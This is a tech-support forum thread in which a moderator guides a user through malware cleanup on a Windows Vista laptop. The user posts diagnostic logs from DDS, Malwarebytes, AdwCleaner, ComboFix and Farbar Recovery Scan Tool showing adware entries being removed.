Go Back   Tech Support Forum > Security Center > Virus/Trojan/Spyware Help > Resolved HJT Threads

User Tag List

Malwarebytes found virus

This is a discussion on Malwarebytes found virus within the Resolved HJT Threads forums, part of the Tech Support Forum category. Hi, I just did a malware bytes scan and it has found 1 trojan and 5 rootkits. There are also


 
 
Thread Tools Search this Thread
Old 12-20-2016, 08:35 PM   #1
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



Hi,
I just did a malware bytes scan and it has found 1 trojan and 5 rootkits. There are also 6 or 7 items in the quarantine area with solvusoft in their name.
I have been having update problems so instead of just removing them I came here just in case there is a connection. I passed an ESET online scan no probs a couple days ago.
win98forever is offline  
Sponsored Links
Advertisement
 
Old 12-21-2016, 08:19 AM   #2
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



techie19- It would be very foolish for me to take the advice you PM'd me. No one should accept help from anyone who cannot post in this thread.
We are meant to only take action recommended by the people who do virus/trojan/spyware help for TSF. Once you post here you should not make any changes to your computer that are not instructed from qualified personnel on here unless you intend to remove the post from this forum.
win98forever is offline  
Old 12-21-2016, 08:54 AM   #3
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



I forgot to add this.
The "problem" is that MWB detected several malwares in a scan. I have been having update problems and figured the two might be connected so I started this thread. I have not removed the detected malware or done anything else since posting. Then I realized/remembered there are other steps for posting here and now I am adding them here

DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16819 BrowserJavaVersion: 11.111.2
Run by Me at 8:49:47 on 2016-12-21
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1915.952 [GMT -8:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {71A27EC9-3DA6-45FC-60A7-004F623C6189}
SP: Microsoft Security Essentials *Enabled/Updated* {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
C:\Windows\system32\svchost.exe -k rpcss
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\System32\svchost.exe -k HPZ12
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Windows\RAVCpl64.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Windows\System32\hkcmd.exe
C:\Program Files\TOSHIBA\TOSCDSPD\TOSCDSPD.exe
C:\Windows\ehome\ehtray.exe
C:\Windows\system32\igfxsrvc.exe
C:\Program Files (x86)\Toshiba\ConfigFree\NDSTray.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Toshiba\ConfigFree\CFSwMgr.exe
C:\Windows\ehome\ehmsas.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
c:\Program Files\Microsoft Security Client\NisSrv.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\SysWOW64\explorer.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = about:blank
uDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
mDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
mWinlogon: Userinit = userinit.exe,
BHO: Ghostery Plugin: {6BF739DD-3323-4C6A-975B-C7E00A50B154} - C:\Program Files (x86)\Ghostery\bin\ghostery.dll
BHO: Java(tm) Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll
uRun: [TOSCDSPD] TOSCDSPD.EXE
uRun: [ehTray.exe] C:\Windows\ehome\ehTray.exe
mRun: [NDSTray.exe] NDSTray.exe
mRun: [jswtrayutil] "C:\Program Files (x86)\Jumpstart\jswtrayutil.exe"
mRun: [cfFncEnabler.exe] cfFncEnabler.exe
mRun: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\MICROS~1.LNK - C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
mPolicies-System: EnableUIADesktopToggle = dword:0
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
DPF: {CAFEEFAC-0018-0000-0045-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.8.0/jinstall-1_8_0_45-windows-i586.cab
TCP: NameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{C12D3495-9B83-4917-A534-5FCF1ED20B86} : DHCPNameServer = 75.75.75.75 75.75.76.76
LSA: Security Packages = kerberos msv1_0 schannel wdigest tspkg
x64-mDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
x64-Run: [Windows Defender] C:\Program Files (x86)\Windows Defender\MSASCui.exe -hide
x64-Run: [TPwrMain] C:\Program Files (x86)\TOSHIBA\Power Saver\TPwrMain.EXE
x64-Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
x64-Run: [SmoothView] C:\Program Files (x86)\Toshiba\SmoothView\SmoothView.exe
x64-Run: [Skytel] Skytel.exe
x64-Run: [RtHDVCpl] RAVCpl64.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HSON] C:\Program Files (x86)\TOSHIBA\TBS\HSON.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [00TCrdMain] C:\Program Files (x86)\TOSHIBA\FlashCards\TCrdMain.exe
x64-mPolicies-Explorer: NoActiveDesktop = dword:1
x64-mPolicies-Explorer: NoActiveDesktopChanges = dword:1
x64-mPolicies-Explorer: BindDirectlyToPropertySetStorage = dword:0
x64-mPolicies-System: EnableUIADesktopToggle = dword:0
x64-Notify: igfxcui - igfxdev.dll
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\
FF - prefs.js: browser.startup.homepage - about:home
FF - prefs.js: network.proxy.type - 0
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_24_0_0_186.dll
.
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2016-8-25 295000]
R0 tos_sps64;TOSHIBA tos_sps64 Service;C:\Windows\System32\drivers\tos_sps64.sys [2015-5-9 504912]
R1 JSWPSLWF;JumpStart Wireless Filter Driver;C:\Windows\System32\drivers\jswpslwfx.sys [2015-5-9 26624]
R2 FontCache;Windows Font Cache Service;C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation [2008-1-20 27648]
R3 FwLnk;FwLnk Driver;C:\Windows\System32\drivers\FwLnk.sys [2008-8-18 8704]
R3 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2014-11-15 135928]
R3 NisSrv;Microsoft Network Inspection;C:\Program Files\Microsoft Security Client\NisSrv.exe [2016-8-30 361816]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2016-8-1 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2016-8-1 124088]
S3 PerfHost;Performance Counter DLL Host;C:\Windows\SysWOW64\perfhost.exe [2008-1-20 19968]
S3 PSMounterEx;Macrium Reflect Image Explorer Driver;C:\Windows\System32\drivers\psmounterex.sys [2015-4-2 169992]
S3 PSVolAcc;PSVolAcc;C:\Windows\System32\drivers\PSVolAcc.sys [2014-7-21 12760]
S3 WIMMount;WIMMount;C:\Program Files\Macrium\Reflect\wimmount.sys [2015-5-14 22096]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\WPFFontCache_v0400.exe [2016-8-1 25800]
S4 clr_optimization_v2.0.50727_64;Microsoft .NET Framework NGEN v2.0.50727_X64;C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe [2015-5-10 90776]
S4 ConfigFree Gadget Service;ConfigFree Gadget Service;C:\Program Files (x86)\Toshiba\ConfigFree\CFProcSRVC.exe [2008-4-3 36864]
S4 ConfigFree Service;ConfigFree Service;C:\Program Files (x86)\Toshiba\ConfigFree\CFSvcs.exe [2008-4-16 40960]
S4 jswpsapi;Jumpstart Wifi Protected Setup;C:\Program Files (x86)\Jumpstart\jswpsapi.exe [2015-5-9 954368]
S4 KR10I64;KR10I64;C:\Windows\System32\drivers\KR10I64.sys [2008-8-18 248320]
S4 KR10N64;KR10N64;C:\Windows\System32\drivers\KR10N64.sys [2008-8-18 237568]
S4 ReflectService.exe;Macrium Reflect Image Mounting Service;C:\Program Files\Macrium\Reflect\ReflectService.exe [2014-7-21 3272656]
S4 SmartFaceVWatchSrv;SmartFaceVWatchSrv;C:\Program Files\TOSHIBA\SmartFaceV\SmartFaceVWatchSrv.exe [2008-4-24 84992]
S4 TMachInfo;TMachInfo;C:\Program Files (x86)\Toshiba\TOSHIBA Service Station\TMachInfo.exe [2008-8-18 46392]
S4 TOSHIBA SMART Log Service;TOSHIBA SMART Log Service;C:\Program Files\TOSHIBA\SMARTLogService\TosIPCSrv.exe [2007-12-3 175104]
.
=============== File Associations ===============
.
FileExt: .js: JSFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
FileExt: .jse: JSEFile=C:\Windows\SysWOW64\WScript.exe "%1" %*
.
=============== Created Last 30 ================
.
.
==================== Find3M ====================
.
2016-12-21 04:11:36 192216 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2016-12-13 19:04:42 802904 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2016-12-13 19:04:42 144472 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2016-11-02 16:16:24 383208 ----a-w- C:\Windows\System32\atmfd.dll
2016-11-02 16:09:14 48128 ----a-w- C:\Windows\System32\atmlib.dll
2016-11-02 1650 306408 ----a-w- C:\Windows\SysWow64\atmfd.dll
2016-11-02 15:59:25 34304 ----a-w- C:\Windows\SysWow64\atmlib.dll
2016-10-28 01:22:26 485032 ------w- C:\Windows\System32\MpSigStub.exe
2016-10-25 23:10:39 2804736 ----a-w- C:\Windows\System32\win32k.sys
2016-10-19 17:24:56 97856 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2016-10-04 14:41:48 90112 ----a-w- C:\Windows\System32\drivers\bowser.sys
.
============= FINISH: 8:50:36.86 ===============
Attached Files
File Type: txt attach.txt (12.9 KB, 10 views)
win98forever is offline  
Sponsored Links
Advertisement
 
Old 12-21-2016, 10:12 PM   #4
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello and Welcome to TSF.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

Please note that these fixes are not instantaneous. Most infections require more than one round to properly eradicate.

Please stay with me until given the 'all clear' even if symptoms seemingly abate.

Kindly follow my instructions and please do no fixing on your own or running of scanners unless requested by a helper.

------------------------------------------------------

If there are any personal files, pics, etc. on your computer you cannot live without, back them up now just as a precaution.

Emergency Backup Procedure - Tech Support Forum

------------------------------------------------------

Please post the MBAM log that reflects 1 trojan and 5 rootkits detected.

------------------------------------------------------

Please download AdwCleaner from here and save it to your desktop.
  • Run AdwCleaner and select Scan
  • Once the Scan is done, select Clean
  • Once done it will ask to reboot, please allow the reboot.
  • On reboot, a log will be produced. It can also be found at C:\AdwCleaner\AdwCleaner[C#].txt
  • Please copy/paste the contents of the log in your next reply.
------------------------------------------------------

Please download ComboFix and Save it to your Desktop.

**Note: It is important that it is saved directly to your desktop**

* Ensure you have disabled all antivirus and antimalware programs so they do not interfere with the running of ComboFix.

Get help here

Double-click ComboFix.exe and follow the prompts to run it.

Your desktop may go blank. This is normal. It will return when ComboFix is done. ComboFix may reboot your machine. This is normal.

When finished, it shall produce a log for you. Please post that log, C:\ComboFix.txt, in your next reply.

Please re-enable your antivirus before posting the ComboFix.txt log.

If you get an 'Illegal operation attempted on a Registry key which has been marked for deletion' error message, please reboot your machine.

------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 12-22-2016, 07:45 AM   #5
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



Hello Chemist,
I have no idea why the log does not show the items it told me were detected. Anyway ADWCleaner detected 11 items.

MBAM log
Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 12/20/2016
Scan Time: 8:04:14 PM
Logfile: 12-20-16 MBAM log.txt
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.11.24.10
Rootkit Database: v2016.11.20.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows Vista Service Pack 2
CPU: x64
File System: NTFS
User: Me

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 12
Time Elapsed: 0 min, 38 sec

Memory: Disabled
Startup: Disabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)



# AdwCleaner v6.041 - Logfile created 22/12/2016 at 07:30:31
# Updated on 16/12/2016 by Malwarebytes
# Database : 2016-12-21.1 [Server]
# Operating System : Windows (TM) Vista Home Premium Service Pack 2 (X64)
# Username : Me - ME-PC
# Running from : C:\Users\Me\Desktop\AdwCleaner.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support



***** [ Services ] *****



***** [ Folders ] *****

[#] Folder deleted on reboot: C:\Users\Me\AppData\Local\YSearchUtil
[#] Folder deleted on reboot: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\YSearchUtil


***** [ Files ] *****

[-] File deleted: C:\Users\Me\Desktop\SysInfo.exe


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Solvusoft
[-] Key deleted: HKU\S-1-5-21-1782139309-2775357304-4162436881-1000\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\DriverDoc_is1
[#] Key deleted on reboot: HKCU\Software\Solvusoft
[-] Key deleted: HKLM\SOFTWARE\Solvusoft
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverDoc_is1
[#] Key deleted on reboot: HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\DriverDoc_is1
[#] Key deleted on reboot: [x64] HKCU\Software\Solvusoft
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\DriverDoc_is1


***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [1685 Bytes] - [22/12/2016 07:30:31]
C:\AdwCleaner\AdwCleaner[S0].txt - [1876 Bytes] - [22/12/2016 07:30:19]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [1831 Bytes] ##########


Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


Combo fix coming
win98forever is offline  
Old 12-22-2016, 08:07 AM   #6
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



Here is the combo fix log.
NOTE- When combo fix was done the computer alerted me to check my malware protection as I had disabled real time protection in MSE. I clicked and then chose turn it on and when I looked at the settings real tiem protection was not disabled? And I noticed in history that there is a malware in all detected items named "Rogue:JS/TechBrolo.E and it recommends removal. Should I do this or wait?

ComboFix 16-12-15.01 - Me 12/22/2016 7:48.1.2 - x64
Microsoft® Windows Vista™ Home Premium 6.0.6002.2.1252.1.1033.18.1915.417 [GMT -8:00]
Running from: c:\users\Me\Desktop\ComboFix.exe
AV: Microsoft Security Essentials *Disabled/Updated* {71A27EC9-3DA6-45FC-60A7-004F623C6189}
SP: Microsoft Security Essentials *Disabled/Updated* {CAC39F2D-1B9C-4A72-5A17-3B3D19BB2B34}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
.
((((((((((((((((((((((((( Files Created from 2016-11-22 to 2016-12-22 )))))))))))))))))))))))))))))))
.
.
2016-12-22 15:56 . 2016-12-22 15:57 -------- d-----w- c:\users\Me\AppData\Local\temp
2016-12-22 15:56 . 2016-12-22 15:56 -------- d-----w- c:\users\Default\AppData\Local\temp
2016-12-21 16:48 . 2016-11-10 07:44 11781064 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{DE35367E-C6C0-418F-A120-0F38F93712D0}\mpengine.dll
2016-12-18 23:52 . 2016-12-18 23:52 -------- d-----w- c:\windows\CheckSur
2016-12-18 23:44 . 2016-11-10 07:44 11781064 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2016-12-18 20:16 . 2016-12-18 20:16 -------- d-----w- C:\65c7b20dc424bda6bd39db516b4d
2016-12-18 17:45 . 2016-12-18 17:45 -------- d-----w- C:\2b654b41d190c0d9a397eb33
2016-12-11 16:12 . 2016-05-11 21:23 1167568 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{BD06FC61-98E6-414B-9838-1B00DE9903B8}\gapaengine.dll
2016-11-24 22:24 . 2016-10-25 23:10 2804736 ----a-w- c:\windows\system32\win32k.sys
2016-11-24 22:19 . 2016-11-02 16:16 383208 ----a-w- c:\windows\system32\atmfd.dll
2016-11-24 22:19 . 2016-11-02 16:09 48128 ----a-w- c:\windows\system32\atmlib.dll
2016-11-24 22:19 . 2016-11-02 15:59 34304 ----a-w- c:\windows\SysWow64\atmlib.dll
2016-11-24 22:19 . 2016-11-02 16:06 306408 ----a-w- c:\windows\SysWow64\atmfd.dll
2016-11-24 22:05 . 2016-11-24 22:05 -------- d-----w- C:\03a9f024af5b29727cd1e2a8
2016-11-24 21:37 . 2016-10-04 14:41 90112 ----a-w- c:\windows\system32\drivers\bowser.sys
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2016-12-22 15:37 . 2015-07-09 14:57 192216 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2016-12-13 19:04 . 2016-05-06 20:01 802904 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2016-12-13 19:04 . 2016-05-06 20:01 144472 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2016-10-28 01:22 . 2015-05-10 16:11 485032 ------w- c:\windows\system32\MpSigStub.exe
2016-10-19 17:24 . 2015-05-10 17:05 97856 ----a-w- c:\windows\SysWow64\WindowsAccessBridge-32.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 138240]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"NDSTray.exe"="NDSTray.exe" [BU]
"SunJavaUpdateSched"="c:\program files (x86)\Common Files\Java\Java Update\jusched.exe" [2016-09-23 587288]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Microsoft Office.lnk - c:\program files (x86)\Microsoft Office\Office\OSA9.EXE -b -l [2000-1-21 65588]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WudfSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
hpdevmgmt REG_MULTI_SZ hpqcxs08
.
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Svchost - NetSvcs
Themes
.
Contents of the 'Scheduled Tasks' folder
.
2016-12-22 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-05-06 19:04]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2008-08-14 1573160]
"Skytel"="Skytel.exe" [2007-11-21 1826816]
"RtHDVCpl"="RAVCpl64.exe" [2008-04-08 6156288]
"Persistence"="c:\windows\system32\igfxpers.exe" [2008-06-25 181784]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2016-08-30 1354712]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2008-06-25 151064]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2008-06-25 209432]
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = about:blank
mDefault_Page_URL = hxxp://www.toshibadirect.com/dpdstart
mLocal Page = c:\windows\SysWOW64\blank.htm
TCP: DhcpNameServer = 75.75.75.75 75.75.76.76
FF - ProfilePath - c:\users\Me\AppData\Roaming\Mozilla\Firefox\Profiles\9izno1f1.default-1437064698897\
FF - prefs.js: browser.startup.homepage - about:home
FF - prefs.js: network.proxy.type - 0
.
- - - - ORPHANS REMOVED - - - -
.
Wow6432Node-HKCU-Run-TOSCDSPD - TOSCDSPD.EXE
Wow6432Node-HKLM-Run-jswtrayutil - c:\program files (x86)\Jumpstart\jswtrayutil.exe
Wow6432Node-HKLM-Run-cfFncEnabler.exe - cfFncEnabler.exe
Wow6432Node-HKLM-Run-HP Software Update - c:\program files (x86)\HP\HP Software Update\HPWuSchd2.exe
SafeBoot-WudfPf
SafeBoot-WudfRd
HKLM-Run-TPwrMain - c:\program files (x86)\TOSHIBA\Power Saver\TPwrMain.EXE
HKLM-Run-SmoothView - c:\program files (x86)\Toshiba\SmoothView\SmoothView.exe
HKLM-Run-HSON - c:\program files (x86)\TOSHIBA\TBS\HSON.exe
HKLM-Run-00TCrdMain - c:\program files (x86)\TOSHIBA\FlashCards\TCrdMain.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Environment*]
"v5Licence0"="15-8DXB-2BGY-5315-9J2D-PQRG-DU44U6D"
"Activated"="Y"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes]
"SymbolicLinkValue"=hex(6):5c,00,52,00,45,00,47,00,49,00,53,00,54,00,52,00,59,
00,5c,00,4d,00,41,00,43,00,48,00,49,00,4e,00,45,00,5c,00,53,00,4f,00,46,00,\
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
"MSCurrentCountry"=dword:000000b5
.
Completion time: 2016-12-22 08:00:35
ComboFix-quarantined-files.txt 2016-12-22 16:00
.
Pre-Run: 47,633,354,752 bytes free
Post-Run: 49,161,199,616 bytes free
.
- - End Of File - - 480AB9E0932C50F4054489215A71EC1F
5B5E648D12FCADC244C1EC30318E1EB9
win98forever is offline  
Old 12-22-2016, 02:55 PM   #7
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello win98forever. You can choose to delete those detections in Security Essentials history if you wish.

Are you still unable to turn on real-time protection in Security Essentials?

------------------------------------------------------

Please download Farbar Recovery Scan Tool and save it to your desktop.
  • Double-click FRST64 to run it. When the tool opens click Yes to the disclaimer.
  • Make sure the Addition.txt button is ticked.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • It also makes another log (Addition.txt). Please attach it to your reply.
------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Old 12-22-2016, 03:06 PM   #8
TSF Enthusiast
 
Join Date: Jul 2009
Posts: 687
OS: vista home premium, Windows 10



MSE Real Time Protection was on when I opened it from the security alert. I removed the item from MSE quarantine.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 21-12-2016
Ran by Me (administrator) on ME-PC (22-12-2016 15:02:30)
Running from C:\Users\Me\Desktop\stuff
Loaded Profiles: Me (Available Profiles: Me)
Platform: Windows Vista (TM) Home Premium Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Synaptics, Inc.) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Windows\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\Toshiba\ConfigFree\NDSTray.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\Toshiba\ConfigFree\CFSwMgr.exe
